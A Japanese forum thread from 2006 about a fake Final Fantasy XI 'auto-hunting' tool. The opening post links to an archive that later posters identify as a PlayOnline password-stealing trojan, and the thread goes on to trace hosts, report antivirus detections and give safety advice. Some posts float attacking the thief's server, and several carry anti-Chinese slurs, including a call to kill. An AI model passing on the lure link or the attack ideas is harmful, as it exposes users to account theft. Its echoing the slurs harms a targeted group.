FF11自動狩り体験版

FF11自動狩り体験版
down: http://www.ff11-info.com/soft/ff11auto.rar

罠

スパイツールきたこれ！

まじで落とすなよ。
FF入ってないPCで落として確認したが・・まずいね。

ばっか、こういう時はネタでもスゲーってレスしとけば社員が引っかかるぜ

>>5

そういう意味でまずいと言ってるのだがw

なんでrarなんだよ

>>6
それはスマンカッタ・・・>>2-3の流れから普通にスパイツールが入ってるよーという事に見えた

よーし、じゃあパパ古いマシンでダウンロードしちゃうぞー
明日までスレ残ってたら報告するお

見るからに妖しすぐるところが魅力的

とりあえず落としたらFF11AUTORUN.exeとかいうファイルだな
exeはやべぇなぁｗキンタマだったりしてｗ

ぐは！やばい、やばいよこれ！！

落ち着け、落ち着け俺！
こういうときは素直にROMるんだ！

うわああああああああああああああやばいよ！！！！！！！！！！
ああああああああああＹわああああああああああＹわややああああああああああ
落ちるけ！！！！！！落ち着け！！！！！！！！！
おまえたち落ち着けよいおおおおおおおおおおおおおおおおお！！！！

うはｗｗｗｗｗｗｗフレから何変なシャウトしてるの？ｗｗｗｗっていわれたｗｗｗｗｗ

やべえｗｗｗｗｗｗ落として使ってるｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

期待age

求む　人柱　自給６００円

【おまんこあげます】【１００００００ｷﾞﾙ】

落としたｗ使ってみるｗｗ

これは使わない方がいいよ　うん絶対そう思う

これは便利だな

使うもなにも取り扱い説明書すら入って居ないように
見えるのだが

http://www●ff11-info.com/soft/ff11auto.rar
↓
www●19800602.com
↓
上のアドレス"www.19800602.com"をググると・・・
「危険サイト」とある。
このページもおそらくトロイ付き。
また支那業者か。

これ使うと

パスを抜かれる気がする
俺の野生の勘ってやつだ

こういうのを面白半分にダウソして実行した馬鹿が
ぽちのようになるんだな

こりゃ便利だ

自動狩ツール体験版

対象を選ぶ(手動)とオートアタックしてくれます
知らないけれどきっとそう

ログ読む前に実行しちゃった・・・。どうしよう

いい勉強になるな

rarは圧縮フォルダだ

中は見てないから分からないけどさ

またツール祭り始まるのか？
飛べるヤツ流してくれ

ていうか、パス抜きには気をつけろよ？
あるか無いか知らないけど、あったら大変なことになるぞ？

これは酷い・・

取りあえず>>1のﾀﾞｳｿしてみたんだが
解凍しても特に変哲もなかったがFFを起動した瞬間に英語やら数字やらが
ﾊﾞｰｰｰｰｯと流れる。１分くらい流れる。その後普通にPOLにはログインできるんだが
なんどやっても現在そのアカウントでプレイしてる人がいるとかでFFにｲﾝできない。
しばらく（15分くらい？）して入ることが出来たが、


俺の
ジョンｗｗｗｗｗｗｗｗｗｗｗｗｗ
スコハｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
カンパ二刀流ｗｗｗｗｗｗｗｗｗｗ
孔雀ｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ
全部なくなってますがｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

とりあえずトレンドマイクロに>>1を送っといた。

>>33

同じアカウントでログインすると先に入ってた方が落とされるんで無いの？

ログインしてるとこにログインした事無い奴って多いのか？

ＰＳ２でログインしてる垢に、ＰＣから同じ垢にログインしようとすると、
ＰＳ２が落とされて、後からログインしたＰＣで優先的にログインできる

つまり、いうまでもないが>>33はネタ
ホントにいうまでもないな、、、どうせネタ書くならもうちょい信憑性あるように書けよ

>>33
本当だったら失礼だが嘘くせぇ！
というか、結果報告一つだと本当か嘘か判断できん

ログイン状況を監視して
ログイン切れたら自動ログオンさせるツール作った俺は紙

>>33
ほんとでした。orz

リネでも同じ手口の罠書き込みがあったな。
東亜病夫どもはマジで死ね('A`)

ツーラーなんかみんな死ねばええねん

通報しました。1はタイーホ

IP検索したところ

IPアドレス 211.100.26.198
ホスト名 www.ff11-info.com
IPアドレス
　割当国　※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

やはり中国かw

妹が欲しいよ；；

>>1の意味を履き違えるな


　　自　動　に　狩　ら　れ　る　の　は　お　前　等　だ

ぷぷ

自動狩りなんか輪ゴムと連射パッドでイナフだろとか思う
モソクな俺がいたｗ

お菓子

■リネージュ資料室より
ttp://lineage.nyx.bne.jp/misc/security/?id=case-site#AUTOLINEAGE

2006年3月上旬に、あちこちのBBSに「リネージュ自動狩り体験版」と称したURLの書き込みがありました。
リンク先はRAR形式の圧縮ファイルで、解凍すると実効形式のファイルが入っています。
このファイルを実行すると、リネージュのIDとパスワードを盗み出すトロイの木馬に感染します。
リネージュだけでなく、次のように他ゲーム向けのトロイもあります。

http://lineage●1102213●com/soft/autolineage●rar (リネージュ向け)
http://nobunaga●1102213●com/soft/nobolauto●rar (信長の野望Online向け)

通報しますた

ちょっとつかってみたけど、爆発した

うぅぅおおおおおおおおおおおおおおおおおおおををおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおおお

>>48
それって犯人タイーホされたりとかあった？
お咎めなし？

サーバーが日本の物じゃない限り
日本の当局がどうこう言えないのがつらいな

>>50
ちょｗｗｗｗｗｗｗｗｗマジデｗｗｗｗｗｗｗ

なんてね

逮捕して欲しいよな。でもこういうのって大概逃げ道作ってんだろ？
前レスにもあったように中国が元になってるんなら難しそうだよな

ＦＦを対象にしたものだからこんな笑い話程度で済むけど
サイバーテロの摘発の難しさを露呈させるのがなぁ・・・

こういったネットワーク犯罪系にはどういった国際協力がとられてるんだろ？

笑い話ですまねーだろ
よくしらんが、不正アクセス禁止法とかにひっかかるんじゃねーの

>>55
けど使うほうにも問題あるんじゃない？
ねずみ講とかもそうだけど、結局使う側が欲豚だからかかるのよ。
リターンにはリスクは付き物。
俺はこの手の罠は好きだけどなｗ
アホしかかからんわけだし。

国外じゃ摘発が難しいとかじゃねの？

落としたがファイルが開けません。って言われた・・・
ＦＦ入ってみたが特に異常もない・・・
なにこれ？

>>60
てめえのＰＣにrar解凍できるソフトが入ってねえだけだｗｗｗｗｗｗｗｗうぇｗｗｗｗｗｗｗｗｗｗｗｗ

そかｗ
ならオレは助かったなｗ

>>60
解凍も出来ないような奴が軽はずみに落とすなよｗｗ
そして大体かかるのはこういう無知な欲豚。
取り締まる必要は無いと思う。
鯖アタック掛ける中華は取り締まってくれ。

素人はlhaplasでもダウソしてろってこったｗ


一昔前はlhasaでよかったのにな・・・

不正ツール目的で引っ掛かる奴もｱｲﾀﾀだが
その結果、シナチク共の懐が潤うなら取り締まったほうが良い。

したらばの合成板にも立ってたな

ところで>>1の名前とメール欄はなんなの？ｗ

保存さえしなければ安全？

そこにメールしてみればいいんやない？

！？
メールアドレスなんだ、普通のhotmail！？

ぱそこんが爆発した

ツールの戦闘力が高すぎるんだな・・・

単なるフリーのメアドだな
ＭＳＮメッセンジャーで登録できそうではあるが・・・
捨てアドとかねーから、ためすのカンベソ

起動したら>>1のツールにＩＤとｐａｓｓが飛ぶ仕様だったりしてｗ

とりあえずhttp://www.virustotal.com/　から検体送ってみた結果
VBA32というアンチウイルスソフトだけはsuspected of Trojan-PSW.Lmir.12という名前で検知される模様。

あとノートンとバスターに直接検体を送った

おいすげーぞ
これ使ったらラングモントに落人ヤグわいた

>>76
画像うｐよろ
倒した後でもログ撮ってくれ
まぁ嘘なんだろうけどｗ

お前ら気をつけろオマンコ
罠ツールに引っかかるとオマンコ
悲惨だぞオマンコ
俺も罠ツールをオマンコ利用したオマンコばかりに
語尾にオマンコ「オマンコ」ってついてしまうオマンコ
恐ろしいオマンコウィルスにオマンコ犯されてしまったオマンコ
なんとかオマンコできないものか・・・オマンコ

はい、いま会社だから無理です

>>78
せめて法則性持たせろよｗ

>>79
そのＩＤいいな。なんかゴルフに行きたくなって来た

彼女ができた＾＾ｖ

>>56
一応、協力体制決議はだされているが署名したのは４８ヶ国だけ
法整備もおいついてないし他国から自国への侵入は許さないが
自国から他国へ攻撃するのはお咎めしてないのが現状。

これやべぇ
なんか敵に攻撃しかけたら自動で攻撃してくれるｗ
魔法とかアビはマクロとかコマンドからだけどね

>>53
数年前だけど、ヨーロッパのサーバーを借りて
未成年者のわいせつ画像をアップしてた奴が捕まった事あるぞ
だからサーバーが日本じゃなくても向こうの国が捜査に協力すれば捕まえることが余裕で簡単w

このトロイのデータが送られるところに田代砲はあり？ｗ

ありでしょう

超突く(´３｀)

あまりにも危険なにおいがするんでマジレスしときまｗ
　Name: www.ff11-info.com
　Address: 211.100.26.198
　Name: www.19800602.com
　Address: 211.100.26.198

つまり、「www.ff11-info.com」＝「www.19800602.com」です。
で、19800602.comは、というと

■ セキュリティ対策 （危険ドメイン）
　ttp://lineage.nyx.bne.jp/misc/security/?id=url-domain
　リネージュ関連のトロイの木馬が置かれていたことのあるドメインの一覧です。
　詳細については事例集の「感染源サイト」を、利用法については「基本の対策」内の
　「危険URLのブロック」、および「スパム対策」をご参照ください。
■ マビノギ公式
　ttp://www.mabinogi.jp/5th/3_free.asp?bbs_mode=view&depth=0&p_thread=22352999&num=22353&bc=10&list_mode=all&page=1
　ホムペやブログ等での周知、Overtureへ撤去要請、ファイアウォール等での遮断。
　　遮断ホスト　211.100.26.198, *.19800602.com, *.mabinogi-info.com

DLして解凍まではセーフ。exe実行はアウトってとこかな？ｗ

なんか使ったらスゲーみたいな煽り書こうと思ったんだけど、危険なスメルがするからやめとこうｗ

パソコン蛾ぶっ壊れたのAA貼って置いて

　 　∩＿＿＿∩
　　 | ノ　　　　　 ヽ
　　/　｡●　 　 ●｡|　　 パソコン蛾ぶっ壊れた・・・
　 |　　U　( _●_)　ミ　
　彡､　　　|∪|　　ﾉ　　　 /￣￣￣￣/　
/　＿＿＿ヽノ　/＿_　　/　ｸﾏ専用./
(＿＿＿＿＿）/＿＿） /＿＿＿＿/
　|　　　　　　 /lﾆﾆﾆﾆﾆlニニニニニl

　 　∩＿＿＿∩
　　 | ノ　　　　　 ヽ
　　/　｡●　 　 ●｡|　　 数年間積み重ねてきたＦＦ11のキャラの所持金や
　 |　　U　( _●_)　ミ　 アイテムが0になってた・・・
　彡､　　　|∪|　　ﾉ　　　 /￣￣￣￣/　
/　＿＿＿ヽノ　/＿_　　/　ｸﾏ専用./
(＿＿＿＿＿）/＿＿） /＿＿＿＿/
　|　　　　　　 /lﾆﾆﾆﾆﾆlニニニニニl

もう中国人全員殺せよ

>>85
中国が協力するはずが無いｗ

このスレは祭りになる！

中華サイトというのはネタじゃなかった、リネのハックサイトらしいが
>>1のURL検索
http://72.14.235.104/search?q=cache:hE7akvdNCEoJ:www.19800602.com/+%22www.ff11-info.com/%22&hl=ja&gl=jp&ct=clnk&cd=1
↓
管理者を検索してみると、見事中華の赤ハック危険サイトでした
http://72.14.235.104/search?q=cache:oREt5UFnvCIJ:lineage.nyx.bne.jp/misc/security/%3Fid%3Durl-site+%22www.19800602.com/%22&hl=ja&gl=jp&ct=clnk&cd=1

今はすぐに罠と分かるような仕掛けになってるが
だんだんと巧妙な仕掛けになってくるんだろうな。
さすが汚い！金がからむと中国人は汚い！金の為ならウンコにだって魂売るアルヨ！

早速みんなでメールしよう。

経産省にメールしてRMTを法的に規制してもらおう
http://live19.2ch.net/test/read.cgi/ogame/1153140554/l50

自動で狩りは出来た

やっぱり中国人は糞だな

うお、こりゃスゲー！
なんか高いアイテムがばんばん送られてくる！
2億かせいだ！

中華貧民猪国

http://www.apnic.net/apnic-bin/whois.pl?searchtext=211.100.26.198

やべえええこれは使える　　　　スパイツールですね

自動で狩られた人(´・ω・)ｶﾜｲｿｽ

なるほど

落とすだけで自動でアカウントが狩れるツールなのか

外出前にカキコ。
このサイト「FF11花の雫情報局」と同じようだね。

件の事件の時に、●WWW.ff11-info.comと●WWW.19800602.com を
ファイアーウォール設定で弾いてるんで判ったわ。

すげぇ。

自動で狩られるのか。マジワロスｗｗｗｗｗｗ

おまえらｗｗ

やばいの判ってんならageるなよｗｗｗ

晒しageｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗｗ

マイナーな圧縮ファイル拡張子のrarって時点で怪しさ100%だろ。

自動狩りツールなんて、安全なActivePerl版があるじゃん。。。何を今更

rarがマイナーってｗｗｗｗｗｗｗ

マイナーっていうのはgcaとかの事をいえよw
zipやlzh以外はすべてマイナーか？wwww
いつの時代だよwwwwww

http://www.ff11-info.com/html/cai.html

MAIL:
[email protected]
TEL:03-3846-5277

普通に電話番号書いてあるゾ？

>>116
>>97

そのメールアドレスが日本ドメインぽかったので
またまたIPアドレスで検索してみた

IPアドレス 219.101.148.16
ホスト名 www.cqpub.co.jp
IPアドレス割当国　※ 日本 (JP)

日本は日本なんだけど、ちょいと面白い部分を発見

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 219.101.148.0/25
b. [ネットワーク名] CQPUB
f. [組織名] CQ出版株式会社
g. [Organization] CQ Publishing Co., Ltd.
m. [管理者連絡窓口] SY084JP
n. [技術連絡担当者] SY084JP
p. [ネームサーバ]
[割当年月日] 2002/06/05
[返却年月日]
[最終更新] 2002/06/05 15:53:04(JST)

CQ出版株式会社　ttp://www.cqpub.co.jp/

トランジスタ技術にDesign Wave Magazineっていう雑誌を出版してるらしい
これら書店で何回か見かけたことあるけど、中華だったのか
これはもう不買活動発生フラグたってしまった？

鯖貸してるだけだろ

>>60-62
腹いてぇｗ

>>120
HP見てみたけど、そんな事業はしてないっぽい
会社案内にそういうのしてたら書いてるはずだからね

もしかしたら内部の人間、誰かがしてるだけっていうネタなのかもしれんが
それでも常識的に考えると・・・

これは使える(笑)

今使ってるやつより、使いやすいねコレ

マジレスしてる人も居るが、>1に引っ掛かるようなアホは
自滅してもらった方が良いような。

>>122
>>1のHPのドメインは中華
>>1のサイトの管理者が使ってるメール鯖のドメインは日本
これってただの業者が使ってる携帯サービスの延長じゃね？

どちらにしろ無防備にこのツール起動させたやつはアホだ

03-3846-5277検索したら
露子FF11攻略情報てサイトがヒット

>>126
転送サービスもありえるかなって思って"＠cqpub.co.jp"だけでググって
＠cqpub.co.jpで検索出てきたとこだけグーグルでの1、２、３だけ見てきたけど
出てきたのはすべてCQ出版のメール内容だけ

だから転送サービスもない模様

やばいよやばいよｗ

実際のメールは[email protected]
あとサイトのつくり見ると、どっかから朴ってきた感じだな。
HTMLのファイル名とか、ページの内容に沿っていない。
たぶん、cqpub.co.jpは改変し忘れた部分ではないかと。

http://www.cqpub.co.jp/hanbai/books/18/18621.htm

たぶん、これに付属しているCD-ROMからHTML拝借してサイトつくったんだろｗ

ページ自体も以下のサイトからのパクリだな。
http://www.geocities.jp/ff11mining/mining/index.html
http://ff11.qpys.com/bisi/bouei.html
http://yukke.sub.jp/ff11/cook/toku.html
http://www.ff-net.net/getmap.php
http://www.lilac.cc/~zinv/ff/ff11mac.htm
http://ff11wiki.rdy.jp/1471361246.html

■eよ一応何か対応しろ。

いやぁぁぁぁぁぁぁぁあああぁぁぁぁぁあぁぁぁぁ；；；；；；；；；；

これ使うと


俺のチンコが抜かれる気がする

ベヒ皮げっとぉｖ＾＾

罠だと認定されても法的に罰する事は出来ないのか？
スレ読んでたら他ゲーでも同じ事してるようだがそっちはどう対応したんだろう。

どちらの黒子さんでしょうか

だれか>>116に電話してみろよｗ

トロイでしかもIDとパスを吸いだすってものは悪質だから取り締まれるんじゃね？

公衆電話使ってやろうかって思うけど、
家近辺に公衆電話がないwwww

　　　　　　ｵ､ｵ、ｵﾜﾀｰｵﾜｵﾜｵﾜﾀｰ♪
　　　　　　＼　　　　ｵｵｵｵﾜﾀｰｵﾜｵｵﾜｵﾜﾀ／
　　　　　　　　　♪＼(^o^)　♪
　　　　　　　　　 ＿　 ) 　> ＿ ｷｭｯｷｭ♪
　　　　　　　　／.◎。／◎｡／|
　 ＼(^o^)／.|￣￣￣￣￣|　 | 　＼(^o^)／
　　　 )　 )　 .|　　　　　　 　|／　　　ノ　ノ
((((　 >￣ > ))))　＼(^o^)／　(((　<￣<　))))
　　　　　　　　　 　 　 )　　)
　　　　　　　　　(((　　>￣ > ))))

確かアド貼ったやつはタイーホにならなかったっけ？
おつ＾＾；

何の説明もないようなファイル落として
実行したらまずいだろ流石に

そのまえに何がどう「自動」なのかねぇ
パス抜きは別としてNMに突撃しそうだよ
オロボン((；ﾟДﾟ)ｺｴｰﾖ

〜じゃね？　とか　〜だっけ？　ばっかだなｗｗｗ

じゃね　４回
だっけ　０回

検索結果
〜じゃね？　2件
〜だっけ？　0件


おつ＾＾；；；；；；；；；；；；；；；；；

>>139
電報サービスに繋がった。。。

>>148
上手いｗ

>>139
電話してみたw

普通の家庭用電話の留守電が出てきたｗｗｗ
まぁ、RMTサイトの書いてある電話にかけても相手が出てきて延々と無言だったし

なんだろねーｗ

>>119
メールアドレス詐称の疑いがあるから、
ＣＱ出版の広報に問い合わせて見るのが早そうだな

スパイウェアの配布は最近出来た法律で犯罪にならなかったっけ？

FF12のガンピットみたいなやつだったら、４アカ持ちの
オレとしては非常に助かるんだが、ただの罠ツールかよ。

危ない拡張子って exe　とかあるじゃん？
色々な拡張子の危ない順位で教えてたもれ。

田代祭り？

>>154
危ないも何も、フォルダの格好した奴だって
プロパティで見ると拡張子がexeだったりするから、
無闇に落としたファイルをダブルクリックするのは危険だお。

まず拡張子を表示しない設定にしてる奴がキチ外

そして拡張子表示方法も知らない奴がツールに手を出すのが想定の範囲外。
まぁそいつら目当ての罠ツールなんだろうが。

キンタマ入りか
おまんこシャウト付きか
ＰＯＬパス抜きトロイ入りか
馬鹿が引っかかるのを待ってるのかな

　

今夜は祭りですか？^^

しっかし、こういうとこ■e駄目だよなぁ。こんな罠サイトできてるんだから
さっさとトップページで危ないですよと告知しろと。

つい数日前に、胡散臭いツールはダウソすんなって
トップ告知したばっかだろｗ

告知してなかったか？

一番下のInformationのとこにあった。誰も気がつかないってｗ

http://www.playonline.com/ff11/index.shtml

今でもトピックの上から3つ目に関連のがあるんだが。

>>112
前にもこいつみたいなの沸いてRARマイナーｗｗ
ってのに突っ込んだら「釣りだろ」言われた
だからもう言わない

rarは日本の一般家庭じゃマイナーなんじゃね？
日本って基本的にずーっとLZHマンセーだったじゃん。
rarを知らないのはtarボールだとかgzipだとか知らないのと大差ない。

rarはP2Pで人気

>>167
rarは日本じゃアンダーグランド系で使われる確率の方が
高いからな。

いや普通に使うだろ

zipでいいじゃん。何も変わらないでしょ

仕事ではZipを使えって言われるお。

・普通に使うアンダーグラウンド当たり前の人
・LZH・ZIPしか知らない(必要の無い)人

rarは解凍する人の事を何も考えていない(考える必要の無い)ファイル。
仕事で対外的に送信する場合はまず使わない。

つまり、どこかのだれかが開く人の利便性をまったく考えないで作った可能性が高い、
という事。

rarが普通と感じる人は、自称パソコンのプロの人なんでしょう。

そりゃ解凍出来るソフトの数が段違いだからな。
高圧縮率によるメール転送等でのメリットなんぞ
運悪く相手の環境でrarが解凍できなかった場合の手間隙で軽く消えてしまう。
圧縮性能なんぞ普及率の前には消えて霞む程度のもんです。

お試し版のrarを数年使ってるが更新０
毎回金払えって出るが、閉じる押すと開けるバグありｗ
バグ報告はしていない

rarは一般的ではないな。
日本はLzh　＞＞　Zip　＞＞　Rarで元々、日本でRarはUGで人気だった。
WinRarは有料でLzhやZipは無料だから一般家庭でメジャーな訳ないぢゃん。

Rarは圧縮率の高さ、分割、自己解凍等のメリットがあるからP2P以前のFtp鯖やUGで流行した名残りだろう。

rarとかzipとかlzhに何の違いがあるのか全く分からない
固められればなんでもいいんじゃねーの？

>>178
お前はISHでもつかっとけｗ

lzhは大昔にファイル壊されまくったのでトラウマになって２度と使わなくなった

古い解凍ソフトやウイルス対策ソフト使ってると
解凍・ウイルススキャン時にバッファオーバーランおこしたり
絶対パスでWindowsフォルダ内に解凍されちゃったりするから
そーゆーのも気をつけろよ

>>176
バグじゃないだろｗ


とマジレス。

>>180
お前ももISHつかっとけｗ

>>176
オレも同じだｗ

落として使ったらYou Tubeから請求がきた！

落として使ったらサポートディスクからGM求がきた！

('Д')・・・

ＧＭ求・・・・・・・・・・・・・・

age

どっかの馬鹿がひっかかってくれんかなage

キャビネットファイルを忘れてるぞ！！ｗ

PAK して ISH でアップロード、これ最強
ちなみに俺は ZOO 派
Larc も出来良かったね

今北産業

今北三興

>>193
１．>1のサイトからダウンロード・解凍・実行　パスワードを中華に送信
２．１時間まつ
３．装備・ギルをだれかにプレゼント！　OS入れ直し

>>195
把握した。うわぁ…

>>193

>>23 >>43 >>48 >>89 >>97
この辺を読むよろしｗ
ぶっちゃけ、シャレにならなさそうなんで
ふざけるのは止めといたほうが良いと俺は思うｗ

FF11自動狩り体験版
どんなのかと思ってrar解凍実行したら
PCぶっとんだよ。
なにこれ、ふざけてるの？

俺の人生のぶっとんでくれ

神ツール

神ツールとかいってふざけてるヤシは業者？

業者ってかふざけてる厨房じゃないの？

アイテムをRMT業者にすっぱ抜かれて
日本の円が糞中国に渡るのを楽しめる神経の持ち主なんておめでたいよな

これはすごい

>>197
追加
www●19800602.comは以前ＨＰにトロイが仕掛けられててＩＤとパスを抜きをしていたサイト
これは■eはどこっていうように明言していなかったが、
ここは件のサイトであった

今回はその２回目

membres.lycos.fr/pokotanfr/
ココみたいなのをまた絶対作るなよ！いいな！絶対だz

agu

このサイトってEXEを実行しなくてもアクセスしただけで感染するの？
WindowsUpdateとかやっててもダメ？

age

めっさ使える

インターネットに接続して遊ぶ「オンラインゲーム」での仮想通貨などをめぐるトラブルや不正行為が急増し、
経済産業省が大手ゲーム業者への聞き取りなど本格的な実態調査に乗り出したことが、１７日明らかになった。
不正プログラムでデータを改ざんし、ゲームの中で使う仮想通貨や武器を大量に取得、
ネット競売で現金に換える組織的な不正が急増。利用者がゲームに接続できなくなったり
詐欺まがいの行為も目立ってきたため、同省は業界に被害対策や自主規制作りを急ぐよう促している。

http://headlines.yahoo.co.jp/hl?a=20060717-00000059-kyodo-bus_all
経済産業省

http://www.meti.go.jp/index.html
ご意見・お問い合わせ

http://www.meti.go.jp/main/comments.html
ご意見・お問い合わせE-mailアドレス
[email protected]

age

いいスレだ。

黒弱体は業者黒樽軍団のせいです。経済産業省にﾒｰﾙしましょう。

インターネットに接続して遊ぶ「オンラインゲーム」での仮想通貨などをめぐるトラブルや不正行為が急増し、
経済産業省が大手ゲーム業者への聞き取りなど本格的な実態調査に乗り出したことが、１７日明らかになった。
不正プログラムでデータを改ざんし、ゲームの中で使う仮想通貨や武器を大量に取得、
ネット競売で現金に換える組織的な不正が急増。利用者がゲームに接続できなくなったり
詐欺まがいの行為も目立ってきたため、同省は業界に被害対策や自主規制作りを急ぐよう促している。

http://headlines.yahoo.co.jp/hl?a=20060717-00000059-kyodo-bus_all
経済産業省

http://www.meti.go.jp/index.html
ご意見・お問い合わせ

http://www.meti.go.jp/main/comments.html
ご意見・お問い合わせE-mailアドレス
[email protected]

>>207
今回はexe踏まなきゃ平気。

マンキンexe(ホワイター、踏むとHD内のデータを消去/上書き)とか
山田ウイルス(トロイ、HD内部やデスクトップを公開)と同様な手法で
ファイル名を工夫して何とか踏ませようとしてる。
他にもそれらしいアイコンにしたりフォルダに偽装したり手口は様々。

ギル増殖ツール.exe
(流出)長澤まさみの○○シーン.exe
やらないか.exe

当たり前の対策だけども
・怪しいファイルは実行しない
・拡張子は表示する　ttp://www003.upp.so-net.ne.jp/shigeri/technique/technique5.html
・windowsやセキュリティーソフトは常に最新の状態に

インターネットには悪意が流れていることをお忘れなく。

あげとく、引っ掛からないようにな

age

>>210>>213みたいなうざいコピペは逆効果。

>>214
既にIEを狙い撃ちするトロイ仕込まれてるぞ。
今ちょっとテキストまとめ中。

■■■ 警告 ■■■
>>1 は中華RMT業者によるPOLアカウントハックトロイです。
■■■ 絶対に踏むな! ■■■

踏むと、ギルやアイテムを盗まれて全裸無一文、
下手すりゃアカウント売られたり中華に使われたり
隠滅のためキャラ削除POL退会も!

サイトでIEを食う奴とこのrarの奴とでプログラム違うじゃん。
サイトで食わせる奴はUPX圧縮だけど
rarの奴はアカハック部分がUpack圧縮じゃねーか。
解凍できねーよ…。mutexも別っぽい。
とりあえずバラして(邪魔なダミー捨てて)各社に検体投げつけてくるわ。

ま、ファイル直リンは踏む奴がアホってことで
IEで開いただけで感染する方の情報を雑談スレに書いといた。

>>174
>rarは解凍する人の事を何も考えていない(考える必要の無い)ファイル。
>rarが普通と感じる人は、自称パソコンのプロの人なんでしょう。

素人って、自分が知らないことはマニアックなことで、
知っていることが常識なんだよな

>>174は誰がどう見てもネット初心者（２年目ぐらい）

せめて理由もつけて説明しないと…。

age

sage

もしノートン使いで検知しないようなら誰か送っておいて
マカフィーとバスターには送った

age

それで本当にアウトだった奴はいるのか？
というより、前のサイトの時も抜かれた奴っていたのかね？

>>228
はやく1のファイル実行して氏ね

Trojan.Finfanse - Google 検索
http://www.google.com/search?num=50&hl=ja&ie=UTF-8&oe=UTF-8&q=Trojan.Finfanse&lr=lang_ja
PlayOnlineのアカウントを盗むウイルス、コードに中国語で「最終幻想」
http://internet.watch.impress.co.jp/cda/news/2005/10/28/9671.html

Symantec Security Response - Trojan.Finfanse
http://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.finfanse.html


TSPY_POVIEWER.A - 概　要
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TSPY_POVIEWER.A&VSect=P

>>228
前回(去年の夏〜冬)大量に抜かれていたのは
鯖に特攻して判明している。


このところアカハックの話しがちらほら出ていたけど、
LSコミュ(含むフィッシング)とか罠ツールとかじゃなくて
中華RMT犯が「露子」トロイを実戦投入するにあたって
(新しいアカウントを収集できる目処が立ったので)
前回溜め込んでいたアカウントを使っただけなんじゃないのかな。

つまり、「花の雫」を踏んだままずっとPOLパスを変更していなかった人のね。

>>228
>>230よりちょっと詳しく昔の経緯を説明しとくと、

神がウィルスを分解→POLのIDとPASSを送りつける先のログインアカウントが中に明記ｗ
→神がそのまま鯖をハック→罠鯖の中（のＨＤＤ）を調べたらすでに引っかかった人の
ID・PASSリストﾊｹｰﾝ→せっかくだから消しておきました＾＾

って感じ。

「花の雫」見に行ってパス変えないとかどんだけお間抜けなんだ。
心当たりのある人はPOLメニューの会員情報から変えれるから変えておけよう。
月単位で変えちゃってもいいぐらいだ。

トレンドマイクロから対応したというメール来たよー

お客さまより、お送りいただきました「FF11AUTORUN.exe」をお調べいたしましたところ、
不正プログラムであることが判明いたしました。

弊社では、最新のウイルスパターンファイル「3.581.00」より
「TSPY_FANTASY.C」として検出するよう対応させていただきました。

現在コンピュータ内に、「FF11AUTORUN.exe」が存在する場合には、
不正ファイルとなりますため、削除をお願いいたします。

【ご参考：ファイルの削除方法】

　　・該当のファイルの上で右クリックをし、[削除] の上で
　　　クリックをします。

該当のファイルを削除された後、お手数をおかけいたしますが、お使いの
ウイルスバスターを最新版にアップデート後、全ドライブ検索にて
「TSPY_FANTASY.C」が検出されないことをご確認いただきますよう
お願いいたします。

ﾀﾞｳｿして実行してしまいました。
どうすればいいですか？
パソコンはimac os8.6です。

ｱｷﾗﾒﾛ

>>233
米国に送ろうとして蹴られ、並み居るソフトが検知しないのに
バスターが検知するはずないなと変に思ってたらおまいかｗ

ありがとう。

露子は以下で検知予定(パターン未定)。
icyfox.chm (27,020 bytes) as CHM_DROPPER.BJG
svchost.exe (20,009 bytes) as TROJ_DELF.CHI
UPX解凍 (43,049 bytes) as TROJ_DELF.CHI
米国なので命名がショボい…。

FF11用語辞典++にも注意デタネ　ヽ(´ー｀)ノ＜管理人オツカレー

【花の雫FF11情報局】(はなのしずくえふえふいれぶんじょうほうきょく)
【注 意】
POLアカウント情報を盗むスパイウェアが組み込まれているサイトの名称。

サイトを観覧するだけでウィルスが仕込まれ、POLアカウントID情報を盗まれる可能性がある。
Yahoo!JapanやMSN等のサーチで「FF11」と検索をかけた際に、スポンサーサイトとして表示される。
心当たりのある人は確認をするか、POLパスワードの変更が望ましいかと思われる。
今後、類似サイトが出現する可能性もあり得るので十分な注意が必要である。
スレ住民によりクラックが行われ現在ページは閉鎖されている。

2006/6から2006/7ごろにかけて寝狩りツール配布と称して活動を再開した模様。
不正ツールを使って楽をしようとした愚者を引っ掛けんとしているようである。

>>237
管理人がwiki修正してるんじゃないぞ？

wikiってのは気がついた奴が修正するものだ

今は
【露子FF11情報局】
…

TSPY_FANTASY.Cの詳細
http://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY_FANTASY.C

結局>>1は何の目的でリンク貼ったのかなぁ

�@IDとパスを抜くプログラムを自作したから
�A自分も被害を受けたから

�Aだったら最悪な野郎だな

おまんこ【させてくれませんか？】50000

�@に決まってるじゃまいか。

今回の恐ろしいところはこことか合成板とか細かく記事を投下してるところと、ちゃんとした日本語で書いてるところ。
今後、FF11がらみのexeファイルはもう恐ろしくて恐ろしくてという状態になるね。
おまんこどころじゃない。

>TSPY_FANTASY.C
ファンタジーってｗｗｗ

確認したところで
・ここ
・合成板
・雑談(壷）
・雑談(蟹）※ここはスレたてだけでなくレスも１つしてあったのを見つけた

>>243
最近のLineageトロイの投稿は
他人のハンドルと書き込みをコピペ、
URLだけ差し替え、みたいにしやがる
(日本語を理解しているわけではないので
「これはトロイです」みたいのまでコピペしちゃって
自爆するパターンも多々ある)。

しかも爆撃が半端ない。

zhangweijp でググってみ、件数すごいから
(Lineageトロイの古参、おそらく最も有名)。

板についても、「FF11 板」「FF11 BBS」「FFXI BBS」とかで
ググって投下しているだけだと思われ(Lineageの絨毯爆撃もこの手法)。
だから、誰もいない合成板避難所にまで投下しちゃったりする。

>>246と関係あるのか無いのか分からないけれど
物質スレ331の20番カキコにも超うさん臭いexeファイルへの
URLが貼り付けてあるね。

あー、見に行ってもうっかり踏まないようにね。

■eがトップページに大々的に載せないので、注意age

これ花の雫が配付してるってゆう罠ツール？

